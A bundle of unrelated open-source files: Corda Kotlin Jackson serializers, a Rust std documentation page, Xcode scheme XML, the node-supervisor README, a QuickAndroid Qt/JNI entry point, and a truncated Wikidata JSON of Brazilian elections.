                // Validity of left/right is enforced by PartialTreeJson's init block.
                else -> PartialTree.Node(convert(left!!), convert(right!!))
            }
        }
    }
}

/**
 * JSON shape for a partial Merkle tree node. Exactly one of three forms is valid:
 * an includedLeaf hash, a leaf hash, or a left/right pair — checked in init.
 */
@JsonInclude(Include.NON_NULL)
private class PartialTreeJson(val includedLeaf: SecureHash? = null,
                              val leaf: SecureHash? = null,
                              val left: PartialTreeJson? = null,
                              val right: PartialTreeJson? = null) {
    init {
        if (includedLeaf != null) {
            require(leaf == null && left == null && right == null) { "Invalid JSON structure" }
        } else if (leaf != null) {
            require(left == null && right == null) { "Invalid JSON structure" }
        } else {
            require(left != null && right != null) { "Invalid JSON structure" }
        }
    }
}

@JsonSerialize(using = SignatureSchemeSerializer::class)
@JsonDeserialize(using = SignatureSchemeDeserializer::class)
private interface SignatureSchemeMixin

// A SignatureScheme serializes as its scheme code name string.
private class SignatureSchemeSerializer : JsonSerializer<SignatureScheme>() {
    override fun serialize(value: SignatureScheme, gen: JsonGenerator, serializers: SerializerProvider) {
        gen.writeString(value.schemeCodeName)
    }
}

// Accepts either the numeric scheme ID or the scheme code name on input.
private class SignatureSchemeDeserializer : JsonDeserializer<SignatureScheme>() {
    override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): SignatureScheme {
        return if (parser.currentToken == JsonToken.VALUE_NUMBER_INT) {
            signatureSchemesByNumberID[parser.intValue] ?: throw JsonParseException(parser, "Unable to find SignatureScheme ${parser.text}")
        } else {
            Crypto.findSignatureScheme(parser.text)
        }
    }
}

@JsonSerialize(using = SerializedBytesSerializer::class)
@JsonDeserialize(using = SerializedBytesDeserializer::class)
private class SerializedBytesMixin

/**
 * Renders SerializedBytes as {class, deserialized}: the payload is AMQP-deserialized first so
 * the JSON shows the actual object rather than opaque bytes.
 */
private class SerializedBytesSerializer : JsonSerializer<SerializedBytes<*>>() {
    override fun serialize(value: SerializedBytes<*>, gen: JsonGenerator, serializers: SerializerProvider) {
        val deserialized = value.deserialize<Any>()
        gen.jsonObject {
            writeStringField("class", deserialized.javaClass.name)
            writeObjectField("deserialized", deserialized)
        }
    }
}

/**
 * Inverse of SerializedBytesSerializer: reads the {class, deserialized} object, converts the
 * payload back to the named class and re-serializes it with Corda serialization. Non-object
 * input falls back to raw bytes (Jackson decodes base64 text via binaryValue).
 */
private class SerializedBytesDeserializer : JsonDeserializer<SerializedBytes<*>>() {
    override fun deserialize(parser: JsonParser, context: DeserializationContext): SerializedBytes<Any> {
        return if (parser.currentToken == JsonToken.START_OBJECT) {
            val mapper = parser.codec as ObjectMapper
            val json = parser.readValueAsTree<ObjectNode>()
            val clazz = context.findClass(json["class"].textValue())
            val pojo = mapper.convertValue(json["deserialized"], clazz)
            pojo.serialize()
        } else {
            SerializedBytes(parser.binaryValue)
        }
    }
}

@JsonDeserialize(using = JacksonSupport.PartyDeserializer::class)
private interface AbstractPartyMixin

@JsonSerialize(using = JacksonSupport.AnonymousPartySerializer::class)
@JsonDeserialize(using = JacksonSupport.AnonymousPartyDeserializer::class)
private interface AnonymousPartyMixin

@JsonSerialize(using = JacksonSupport.PartySerializer::class)
private interface PartyMixin

@ToStringSerialize
@JsonDeserialize(using = JacksonSupport.CordaX500NameDeserializer::class)
private interface CordaX500NameMixin

@JsonDeserialize(using = JacksonSupport.NodeInfoDeserializer::class)
private interface NodeInfoMixin

@ToStringSerialize
@JsonDeserialize(using = JacksonSupport.SecureHashDeserializer::class)
private interface SecureHashSHA256Mixin

@JsonSerialize(using = JacksonSupport.PublicKeySerializer::class)
@JsonDeserialize(using = JacksonSupport.PublicKeyDeserializer::class)
private interface PublicKeyMixin

@JsonSerialize(using = StateMachineRunIdSerializer::class)
@JsonDeserialize(using = StateMachineRunIdDeserializer::class)
private interface StateMachineRunIdMixin

// A StateMachineRunId serializes exactly like its underlying UUID.
private class StateMachineRunIdSerializer : StdScalarSerializer<StateMachineRunId>(StateMachineRunId::class.java) {
    private val uuidSerializer = UUIDSerializer()

    override fun isEmpty(provider: SerializerProvider?, value: StateMachineRunId): Boolean {
        return uuidSerializer.isEmpty(provider, value.uuid)
    }

    override fun serialize(value: StateMachineRunId, gen: JsonGenerator?, provider: SerializerProvider?) {
        uuidSerializer.serialize(value.uuid, gen, provider)
    }
}

// Parses the UUID string form back into a StateMachineRunId.
private class StateMachineRunIdDeserializer : FromStringDeserializer<StateMachineRunId>(StateMachineRunId::class.java) {
    override fun _deserialize(value: String, ctxt: DeserializationContext?): StateMachineRunId {
        return StateMachineRunId(UUID.fromString(value))
    }
}

@Suppress("unused_parameter")
@ToStringSerialize
private abstract class AmountMixin @JsonCreator(mode = DISABLED) constructor(
        quantity: Long,
        displayTokenSize: BigDecimal,
        token: Any
) {
    /**
     * This mirrors the [Amount] constructor that we want Jackson to use, and
     * requires that we also tell Jackson NOT to use [Amount]'s primary constructor.
     */
    @JsonCreator constructor(
            @JsonProperty("quantity")
            quantity: Long,
            @JsonDeserialize(using = TokenDeserializer::class)
            @JsonProperty("token")
            token: Any
    ) : this(quantity, Amount.getDisplayTokenSize(token), token)
}

/**
 * Implements polymorphic deserialization for [Amount.token]. Kotlin must
 * be able to determine the concrete [Amount] type at runtime, or it will
 * fall back to using [Currency].
 */
private class TokenDeserializer(private val tokenType: Class<*>) : JsonDeserializer<Any>(), ContextualDeserializer {
    @Suppress("unused")
    constructor() : this(Currency::class.java)

    override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): Any = parser.readValueAs(tokenType)

    override fun createContextual(ctxt: DeserializationContext, property: BeanProperty?): TokenDeserializer {
        if (property == null) return this
        // Use the declared token type where known; Any means we can't tell, so assume Currency.
        return TokenDeserializer(property.type.rawClass.let { type ->
            if (type == Any::class.java) Currency::class.java else type
        })
    }
}

/**
 * Intercepts bean-based deserialization for the generic [Amount] type.
 */
private class AmountBeanDeserializerModifier : BeanDeserializerModifier() {
    override fun modifyDeserializer(config: DeserializationConfig, description: BeanDescription, deserializer: JsonDeserializer<*>): JsonDeserializer<*> {
        val modified = super.modifyDeserializer(config, description, deserializer)
        return if (Amount::class.java.isAssignableFrom(description.beanClass)) {
            AmountDeserializer(modified)
        } else {
            modified
        }
    }
}

/**
 * Delegating deserializer for Amount: string input is parsed with Amount.parseCurrency,
 * anything else goes through the normal bean deserializer it wraps.
 */
private class AmountDeserializer(delegate: JsonDeserializer<*>) : DelegatingDeserializer(delegate) {
    override fun newDelegatingInstance(newDelegatee: JsonDeserializer<*>) = AmountDeserializer(newDelegatee)

    override fun deserialize(parser: JsonParser, context: DeserializationContext?): Any {
        return if (parser.currentToken() == JsonToken.VALUE_STRING) {
            /*
             * This is obviously specific to Amount<Currency>, and is here to
             * preserve the original deserializing behaviour for this case.
             */
            Amount.parseCurrency(parser.text)
        } else {
            /*
             * Otherwise continue deserializing our Bean as usual.
             */
            _delegatee.deserialize(parser, context)
        }
    }
}

// ByteSequence subclasses serialize as their raw byte content (via @JsonValue).
@JsonDeserialize(using = JacksonSupport.OpaqueBytesDeserializer::class)
private interface ByteSequenceMixin {
    @Suppress("unused")
    @JsonValue
    fun copyBytes(): ByteArray
}

// Signature types keep full bean properties: @JsonValue(false) disables the inherited value-form.
@JsonSerialize
@JsonDeserialize
private interface ByteSequenceWithPropertiesMixin {
    @Suppress("unused")
    @JsonValue(false)
    fun copyBytes(): ByteArray
}
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="generator" content="rustdoc"> <meta name="description" content="API documentation for the Rust `DIGITS` constant in crate `std`."> <meta name="keywords" content="rust, rustlang, rust-lang, DIGITS"> <title>std::f64::DIGITS - Rust</title> <link rel="stylesheet" type="text/css" href="../../rustdoc.css"> <link rel="stylesheet" type="text/css" href="../../main.css"> <link rel="shortcut icon" href="https://doc.rust-lang.org/favicon.ico"> </head> <body class="rustdoc"> <!--[if lte IE 8]> <div class="warning"> This old browser is unsupported and will most likely display funky things. </div> <![endif]--> <nav class="sidebar"> <a href='../../std/index.html'><img src='https://www.rust-lang.org/logos/rust-logo-128x128-blk-v2.png' alt='' width='100'></a> <p class='location'><a href='../index.html'>std</a>::<wbr><a href='index.html'>f64</a></p><script>window.sidebarCurrent = {name: 'DIGITS', ty: 'constant', relpath: ''};</script><script defer src="sidebar-items.js"></script> </nav> <nav class="sub"> <form class="search-form js-only"> <div class="search-container"> <input class="search-input" name="search" autocomplete="off" placeholder="Click or press ‘S’ to search, ‘?’ for more options…" type="search"> </div> </form> </nav> <section id='main' class="content constant"> <h1 class='fqn'><span class='in-band'><a href='../index.html'>std</a>::<wbr><a href='index.html'>f64</a>::<wbr><a class='constant' href=''>DIGITS</a></span><span class='out-of-band'><span id='render-detail'> <a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs"> [<span class='inner'>&#x2212;</span>] </a> </span><a id='src-185' class='srclink' href='../../core/f64/constant.DIGITS.html?gotosrc=185' title='goto source code'>[src]</a></span></h1> <pre class='rust const'>pub const DIGITS: <a class='primitive' href='../primitive.u32.html'>u32</a><code> = 
</code><code>15</code></pre></section> <section id='search' class="content hidden"></section> <section class="footer"></section> <aside id="help" class="hidden"> <div> <h1 class="hidden">Help</h1> <div class="shortcuts"> <h2>Keyboard Shortcuts</h2> <dl> <dt>?</dt> <dd>Show this help dialog</dd> <dt>S</dt> <dd>Focus the search field</dd> <dt>&larrb;</dt> <dd>Move up in search results</dd> <dt>&rarrb;</dt> <dd>Move down in search results</dd> <dt>&#9166;</dt> <dd>Go to active search result</dd> </dl> </div> <div class="infos"> <h2>Search Tricks</h2> <p> Prefix searches with a type followed by a colon (e.g. <code>fn:</code>) to restrict the search to a given type. </p> <p> Accepted types are: <code>fn</code>, <code>mod</code>, <code>struct</code>, <code>enum</code>, <code>trait</code>, <code>type</code>, <code>macro</code>, and <code>const</code>. </p> <p> Search functions by type signature (e.g. <code>vec -> usize</code>) </p> </div> </div> </aside> <script> window.rootPath = "../../"; window.currentCrate = "std"; window.playgroundUrl = "https://play.rust-lang.org/"; </script> <script src="../../jquery.js"></script> <script src="../../main.js"></script> <script src="../../playpen.js"></script> <script defer src="../../search-index.js"></script> </body> </html>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <Scheme LastUpgradeVersion = "0910" version = "1.3"> <BuildAction parallelizeBuildables = "YES" buildImplicitDependencies = "YES"> <BuildActionEntries> <BuildActionEntry buildForTesting = "YES" buildForRunning = "YES" buildForProfiling = "YES" buildForArchiving = "YES" buildForAnalyzing = "YES"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildActionEntry> </BuildActionEntries> </BuildAction> <TestAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" shouldUseLaunchSchemeArgsEnv = "YES"> <Testables> </Testables> <MacroExpansion> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </MacroExpansion> <AdditionalOptions> </AdditionalOptions> </TestAction> <LaunchAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" launchStyle = "0" useCustomWorkingDirectory = "NO" ignoresPersistentStateOnLaunch = "NO" debugDocumentVersioning = "YES" debugServiceExtension = "internal" allowLocationSimulation = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> <AdditionalOptions> </AdditionalOptions> </LaunchAction> <ProfileAction buildConfiguration = "Release" 
shouldUseLaunchSchemeArgsEnv = "YES" savedToolIdentifier = "" useCustomWorkingDirectory = "NO" debugDocumentVersioning = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> </ProfileAction> <AnalyzeAction buildConfiguration = "Debug"> </AnalyzeAction> <ArchiveAction buildConfiguration = "Release" revealArchiveInOrganizer = "YES"> </ArchiveAction> </Scheme>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <Scheme LastUpgradeVersion = "0910" version = "1.3"> <BuildAction parallelizeBuildables = "YES" buildImplicitDependencies = "YES"> <BuildActionEntries> <BuildActionEntry buildForTesting = "YES" buildForRunning = "YES" buildForProfiling = "YES" buildForArchiving = "YES" buildForAnalyzing = "YES"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildActionEntry> </BuildActionEntries> </BuildAction> <TestAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" shouldUseLaunchSchemeArgsEnv = "YES"> <Testables> </Testables> <MacroExpansion> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </MacroExpansion> <AdditionalOptions> </AdditionalOptions> </TestAction> <LaunchAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" launchStyle = "0" useCustomWorkingDirectory = "NO" ignoresPersistentStateOnLaunch = "NO" debugDocumentVersioning = "YES" debugServiceExtension = "internal" allowLocationSimulation = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> <AdditionalOptions> </AdditionalOptions> </LaunchAction> <ProfileAction buildConfiguration = "Profile" 
shouldUseLaunchSchemeArgsEnv = "YES" savedToolIdentifier = "" useCustomWorkingDirectory = "NO" debugDocumentVersioning = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> </ProfileAction> <AnalyzeAction buildConfiguration = "Debug"> </AnalyzeAction> <ArchiveAction buildConfiguration = "Release" revealArchiveInOrganizer = "YES"> </ArchiveAction> </Scheme>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <Scheme LastUpgradeVersion = "0910" version = "1.3"> <BuildAction parallelizeBuildables = "YES" buildImplicitDependencies = "YES"> <BuildActionEntries> <BuildActionEntry buildForTesting = "YES" buildForRunning = "YES" buildForProfiling = "YES" buildForArchiving = "YES" buildForAnalyzing = "YES"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildActionEntry> </BuildActionEntries> </BuildAction> <TestAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" shouldUseLaunchSchemeArgsEnv = "YES"> <Testables> </Testables> <MacroExpansion> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </MacroExpansion> <AdditionalOptions> </AdditionalOptions> </TestAction> <LaunchAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" launchStyle = "0" useCustomWorkingDirectory = "NO" ignoresPersistentStateOnLaunch = "NO" debugDocumentVersioning = "YES" debugServiceExtension = "internal" allowLocationSimulation = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> <AdditionalOptions> </AdditionalOptions> </LaunchAction> <ProfileAction buildConfiguration = "Release" 
shouldUseLaunchSchemeArgsEnv = "YES" savedToolIdentifier = "" useCustomWorkingDirectory = "NO" debugDocumentVersioning = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> </ProfileAction> <AnalyzeAction buildConfiguration = "Debug"> </AnalyzeAction> <ArchiveAction buildConfiguration = "Release" revealArchiveInOrganizer = "YES"> </ArchiveAction> </Scheme>
{ "pile_set_name": "Github" }
# node-supervisor A little supervisor script for nodejs. It runs your program, and watches for code changes, so you can have hot-code reloading-ish behavior, without worrying about memory leaks and making sure you clean up all the inter-module references, and without a whole new `require` system. ## node-supervisor -? Node Supervisor is used to restart programs when they crash. It can also be used to restart programs when a *.js file changes. Usage: supervisor [options] <program> supervisor [options] -- <program> [args ...] Required: <program> The program to run. Options: -w|--watch <watchItems> A comma-delimited list of folders or js files to watch for changes. When a change to a js file occurs, reload the program Default is '.' -i|--ignore <ignoreItems> A comma-delimited list of folders to ignore for changes. No default -p|--poll-interval <milliseconds> How often to poll watched files for changes. Defaults to Node default. -e|--extensions <extensions> Specific file extensions to watch in addition to defaults. Used when --watch option includes folders Default is 'node|js' -x|--exec <executable> The executable that runs the specified program. Default is 'node' --debug Start node with --debug flag. --debug-brk Start node with --debug-brk flag. -n|--no-restart-on error|exit Don't automatically restart the supervised program if it ends. Supervisor will wait for a change in the source files. If "error", an exit code of 0 will still restart. If "exit", no restart regardless of exit code. -h|--help|-? Display these usage instructions. -q|--quiet Suppress DEBUG messages Examples: supervisor myapp.js supervisor myapp.coffee supervisor -w scripts -e myext -x myrunner myapp supervisor -w lib,server.js,config.js server.js supervisor -- server.js -h host -p port ## Simple Install Install npm, and then do this: npm install supervisor -g You don't even need to download or fork this repo at all. ## Fancy Install Get this code, install npm, and then do this: npm link ## todo 1. 
Re-attach to a process by pid. If the supervisor is backgrounded, and then disowned, the child will keep running. At that point, the supervisor may be killed, but the child will keep on running. It'd be nice to have two supervisors that kept each other up, and could also perhaps run a child program. 2. Run more types of programs than just "node blargh.js". 3. Be able to run more than one program, so that you can have two supervisors supervise each other, and then also keep some child server up. 4. When watching, it'd be good to perhaps bring up a new child and then kill the old one gently, rather than just crashing the child abruptly. 5. Keep the pid in a safe place, so another supervisor can pull it out if told to supervise the same program. 6. It'd be pretty cool if this program could be run just like doing `node blah.js`, but could somehow "know" which files had been loaded, and restart whenever a touched file changes.
{ "pile_set_name": "Github" }
#include <QtCore>
#include <QGuiApplication>
#include <QQmlApplicationEngine>
#include <QQuickView>
#include <QQmlContext>
#include "quickandroid.h"
#include "qadrawableprovider.h"
#include "qasystemdispatcher.h"
#include "automator.h"

#ifdef Q_OS_ANDROID
#include <QtAndroidExtras/QAndroidJniObject>
#include <QtAndroidExtras/QAndroidJniEnvironment>

// Invoked by the Android runtime when this native library is loaded.
JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void*)
{
    Q_UNUSED(vm);
    qDebug("NativeInterface::JNI_OnLoad()");

    // The System Dispatcher must register its native methods from within
    // JNI_OnLoad so it is ready before any QML code uses it.
    QASystemDispatcher::registerNatives();

    // Optional: kick off the example's own Java-side service
    // (calls quickandroid.example.ExampleService.start()).
    QAndroidJniObject::callStaticMethod<void>("quickandroid/example/ExampleService",
                                              "start",
                                              "()V");

    return JNI_VERSION_1_6;
}
#endif

// Entry point of the QuickAndroid example application: sets up the QML
// engine, registers the drawable image provider, loads main.qml, starts the
// test automator, and enters the Qt event loop.
int main(int argc, char *argv[])
{
#if (QT_VERSION >= QT_VERSION_CHECK(5, 6, 0))
    QGuiApplication::setAttribute(Qt::AA_EnableHighDpiScaling);
#endif
    QGuiApplication app(argc, argv);

    QQmlApplicationEngine engine;

    /* QuickAndroid initialization: make the QML modules bundled in the
       resource system visible to the engine's import resolution. */
    engine.addImportPath("qrc:///");

    // Extra feature: serve Android-style drawables via the
    // "image://drawable/..." URL scheme.
    QADrawableProvider* drawableProvider = new QADrawableProvider();
    drawableProvider->setBasePath("qrc://res");
    engine.addImageProvider("drawable", drawableProvider); // engine takes ownership of the provider

    engine.load(QUrl(QStringLiteral("qrc:///main.qml")));

    /* Testing helper — not needed for a regular project. */
    Automator* uiAutomator = new Automator();
    uiAutomator->start();

    qDebug() << "Start QuickAndroid Example Program";

    return app.exec();
}
{ "pile_set_name": "Github" }
{ "Q10271554": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271554" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1945", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1945", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1945" ] }, "Q10271555": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271555" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1950", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1950", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1950" ], "follows": "Brazilian general election, 1945", "followed_by": "Brazilian presidential election, 1955", "office": "President of Brazil", "successful_candidates": [ "Getúlio Vargas" ] }, "Q10271556": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271556" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1954", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1954", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1954" ] }, "Q10271557": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271557" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1958", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1958", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1958" ] }, "Q10271558": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271558" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1962", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian legislative election, 1962", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1962" ] }, "Q10271560": { 
"identifiers": [ { "scheme": "wikidata", "identifier": "Q10271560" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1974", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1974", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1974" ] }, "Q10271561": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271561" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1970", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian legislative election, 1970", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1970" ] }, "Q10271562": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271562" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1978", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1978", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1978" ] }, "Q1045449": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q1045449" } ], "other_names": [ { "lang": "pt", "name": "eleições gerais no Brasil em 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ko", "name": "2010년 브라질 총선거", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones generales de Brasil de 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "fr", "name": "élections générales brésiliennes de 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt-br", "name": "eleições gerais no Brasil em 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "zh", "name": "巴西大选", 
"note": "multilingual", "source": "wikidata-label" }, { "lang": "el", "name": "Βραζιλιανικές βουλευτικές εκλογές 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en-ca", "name": "Brazilian general election, 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en-gb", "name": "Brazilian general election, 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "eleiciones xenerales de Brasil de 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ja", "name": "2010年ブラジル総選挙", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleição de 2010", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleições 2010", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleições gerais brasileiras de 2010", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleições brasileiras de 2010", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleição geral no Brasil em 2010", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "2010" ], "follows": "Brazilian general election, 2006", "followed_by": "Brazilian general election, 2014", "successful_candidates": [ "Dilma Rousseff" ] }, "Q16953490": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q16953490" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1978", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones legislativas de Brasil de 1978", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1978" ] }, "Q20052286": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q20052286" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1935", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1935", "note": "multilingual", 
"source": "wikidata-label" } ], "dates": [ "1935" ] }, "Q2164948": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q2164948" } ], "other_names": [ { "lang": "nl", "name": "Braziliaanse parlementsverkiezingen 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "de", "name": "Wahlen in Brasilien 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones generales de Brasil de 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ro", "name": "Alegeri legislative în Brazilia, 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "nb", "name": "Valget i Brasil 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "eleiciones xenerales de Brasil de 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "haw", "name": "Hāmaniu cīsuāma ua Palakila mai 2006", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "2006-10-01" ], "follows": "Brazilian general election, 2002", "followed_by": "Brazilian presidential election, 2010", "office": "President of Brazil", "successful_candidates": [ "Luiz Inácio 'Lula' da Silva" ] }, "Q2346732": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q2346732" } ], "other_names": [ { "lang": "pt", "name": "Eleição presidencial brasileira de 1998", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1998", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones generales de Brasil de 1998", "note": "multilingual", "source": "wikidata-label" }, { 
